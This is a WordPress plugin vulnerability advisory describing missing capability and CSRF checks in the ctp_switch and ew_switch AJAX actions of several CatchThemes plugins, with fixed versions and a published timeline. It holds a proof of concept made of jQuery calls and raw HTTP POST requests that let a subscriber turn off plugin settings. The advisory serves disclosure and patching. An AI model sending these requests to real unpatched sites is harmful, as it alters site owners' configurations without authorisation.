WordPress Plugin Vulnerabilities
Multiple Plugins from CatchThemes - Unauthorised Plugin's Setting Change
Description
Multiple Plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated users, such as Subscriber to change the plugin's configurations.
Proof of Concept
1) Turn off "Turn On Catch Themes & Catch Plugin tabs"
jQuery.post(ajaxurl,{
action:"ctp_switch",
option_name:"theme_plugin_tabs",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ctp_switch&option_name=theme_plugin_tabs&value=false
2) Turn off "EW: Authors"
jQuery.post(ajaxurl,{
action:"ew_switch",
option_name:"ew_authors",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ew_switch&option_name=ew_authors&value=false
Affects Plugins
Fixed in version 1.9
Fixed in version 2.3
Fixed in version 1.5
Fixed in version 1.6
Fixed in version 1.9
Fixed in version 2.7
Fixed in version 1.4
Fixed in version 1.6
Fixed in version 1.7
Fixed in version 1.6
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-09-20 (about 8 months ago)
Added
2021-09-20 (about 8 months ago)
Last Updated
2022-04-08 (about 1 months ago)